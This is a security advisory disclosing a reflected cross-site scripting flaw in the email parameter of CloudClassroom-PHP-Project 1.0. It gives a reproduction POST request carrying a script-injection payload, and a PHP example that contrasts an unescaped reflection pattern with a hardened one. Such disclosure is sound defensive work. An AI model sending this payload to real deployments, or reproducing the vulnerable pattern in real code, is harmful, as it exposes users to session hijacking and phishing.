Associated Vulnerability
Description
Cross Site Scripting (XSS)
Introduction
CloudClassroom-PHP-Project 1.0 contains a reflected Cross-site Scripting (XSS) vulnerability in the email parameter of the postquerypublic endpoint. Improper sanitization allows an attacker to inject arbitrary JavaScript code that executes in the context of the user's browser, potentially leading to session hijacking or phishing attacks.
------------------------------------------
Vulnerability Type :
Cross Site Scripting (XSS)
------------------------------------------
Vendor of Product :
https://github.com/mathurvishal/CloudClassroom-PHP-Project
------------------------------------------
Affected Product Code Base :
https://github.com/mathurvishal/CloudClassroom-PHP-Project 1.0
------------------------------------------
Affected Component :
postquerypublic.php, email parameter in POST request
------------------------------------------
Attack Type :
Remote
------------------------------------------
Attack Vectors
------------------------------------------
An attacker can exploit this vulnerability by sending a crafted POST request to the vulnerable endpoint /CloudClassroom-PHP-Project-master/postquerypublic, injecting malicious JavaScript via the email parameter. The application reflects this input without sanitization, leading to reflected XSS.
------------------------------------------
Reproduction Steps:
------------------------------------------
Deploy the vulnerable PHP app locally (e.g., http://localhost/CloudClassroom-PHP-Project-master/).
Send the following POST request:
POST /CloudClassroom-PHP-Project-master/postquerypublic HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
email=testing@example.com'"()&%<zzz><ScRiPt >alert(9001)</ScRiPt>&gnamex=abc&squeryx=123&update=Post%20Query!
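As an added illustration (not code from CloudClassroom-PHP-Project, whose postquerypublic.php source is not reproduced on this page), the following PHP contrasts the unescaped reflection pattern the advisory describes with a hardened handler that validates and HTML-encodes the email parameter before echoing it; the function names and acknowledgement text are assumptions, and the sample input mirrors the request body above.

```php
<?php
// Added illustration, not the project's own code: the real postquerypublic.php
// is not shown on this page, so the "vulnerable" function is a hypothetical
// reconstruction of the pattern the advisory describes (POST data reflected
// into the HTML response without escaping).
declare(strict_types=1);

// Vulnerable pattern (hypothetical): raw POST value concatenated into markup.
function render_query_ack_vulnerable(array $post): string
{
    $email = (string)($post['email'] ?? '');
    return "<p>Thanks, we will reply to " . $email . "</p>";
}

// Hardened version: validate the input as an email address, then HTML-encode
// whatever is echoed back so the browser renders it as text, not markup.
function render_query_ack_hardened(array $post): string
{
    $raw = (string)($post['email'] ?? '');
    // filter_var() rejects anything that is not a syntactically valid address,
    // which already stops quotes and angle brackets at the input boundary.
    $email = filter_var($raw, FILTER_VALIDATE_EMAIL);
    if ($email === false) {
        return "<p>Please enter a valid email address.</p>";
    }
    // Encode for the HTML body context regardless of validation (defence in depth).
    $safe = htmlspecialchars($email, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<p>Thanks, we will reply to " . $safe . "</p>";
}

// Constructed sample reproducing the shape of the advisory's request body.
$sample = [
    'email'   => 'testing@example.com\'"()&%<zzz><ScRiPt >alert(9001)</ScRiPt>',
    'gnamex'  => 'abc',
    'squeryx' => '123',
];

// The vulnerable output still contains a live script element; the hardened
// output never does (the value is rejected, and would be entity-encoded otherwise).
var_dump(strpos(render_query_ack_vulnerable($sample), '<ScRiPt >') !== false);
var_dump(strpos(render_query_ack_hardened($sample), '<ScRiPt >') !== false);
```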
------------------------------------------
Reference
https://owasp.org/www-community/attacks/xss/
------------------------------------------
Discoverer : saurabh
Linkedin : https://www.linkedin.com/in/saurabh-b294b21aa/